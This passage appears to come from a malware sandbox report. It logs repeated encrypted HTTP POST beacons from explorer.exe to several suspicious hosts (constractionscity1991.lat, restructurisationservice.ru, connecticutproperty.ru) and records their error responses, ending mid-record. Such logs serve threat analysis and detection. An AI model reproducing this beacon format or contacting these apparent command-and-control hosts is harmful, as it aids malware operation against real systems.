                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            36192.168.2.55001394.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:39.199218035 CET286OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ukacgtlptxyqmcdq.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 335
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:39.199258089 CET335OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ad 1f 59 d5
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)Y!_5?[3}'YJrv+n!QF0r'so,UeSuKVpyy5?tW&ys=Q3?KiMKfkX ~V>JdaoDiEA:
                                            Dec 19, 2024 11:00:40.565376997 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:40 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            37192.168.2.55001494.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:40.698086977 CET285OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://daxnrqammsrat.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 230
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:40.698121071 CET230OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be fd 4e 39 a5
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)N9!|#%4JRC@bEQ^E2+ZsI`PqHM%Fm{V$ryE@Ht|5jyIp[(uC^?:y
                                            Dec 19, 2024 11:00:42.052089930 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:41 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            38192.168.2.550015194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:42.186908960 CET280OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://dsjauwmdkccdd.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 150
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:42.186943054 CET150OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 80 22 50 96
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)"P)F(|i6te.B**HZF!iGAX;[iG
                                            Dec 19, 2024 11:00:43.521437883 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:43 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            39192.168.2.55001694.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:47.776496887 CET286OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://tupclykpsytewcxu.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 217
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:47.776541948 CET217OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 85 5a 38 89
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)Z8(pXdE};6L)FKB<-yg-,P0I3E0u@|xrqF/I,Wv>eadl.kS?dI#
                                            Dec 19, 2024 11:00:49.147445917 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:48 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            40192.168.2.55001794.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:49.274692059 CET285OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://livftrpgdgydc.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 297
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:49.274730921 CET297OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ba 24 2a 92
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)$*jNMo`q0xA[p&V)E%W/HG@]bR/vw?xt"b#fq@$xWjE^*x*k1+8^uoXcm+X{Q
                                            Dec 19, 2024 11:00:50.646676064 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:50 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            41192.168.2.550018194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:50.773264885 CET281OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://drjnlhtrahircg.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 192
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:50.773303032 CET192OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e5 4a 2c bf
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)J,r~;-XfjdZ9qYW6 &ik]r|O:npdAq)A>"(.)bl^J:c
                                            Dec 19, 2024 11:00:52.117582083 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:51 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            42192.168.2.55001994.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:56.760693073 CET282OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://lhhcirujvotn.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 160
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:56.760725975 CET160OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 98 43 2f cc
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)C//iQFr!-]X*_5 ^mDH*irL*p_ufb__!v
                                            Dec 19, 2024 11:00:58.140840054 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:57 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            43192.168.2.55002094.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:58.271836042 CET287OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://unomwhjdoaagckk.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 202
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:58.271836042 CET202OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be eb 4a 72 a9
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)Jrkn@IBLY3LYl/ JZIe^IlPK[gSfGMe4H@`0k,f5Jtqn
                                            Dec 19, 2024 11:00:59.638279915 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:59 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            44192.168.2.550021194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:00:59.771935940 CET279OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://drmwwxjjhona.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 223
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:59.771965981 CET223OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 81 30 49 ac
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)0I8h"_vBT=jb@p}W^qi#ZQr9>x2|:AV(?a;|mb}BjfIN9R:Gi
                                            Dec 19, 2024 11:01:01.112617016 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:00 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            45192.168.2.55002294.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:05.126802921 CET282OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://jqxnkwoysqpv.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 245
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:01:05.126802921 CET245OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 90 56 6f a2
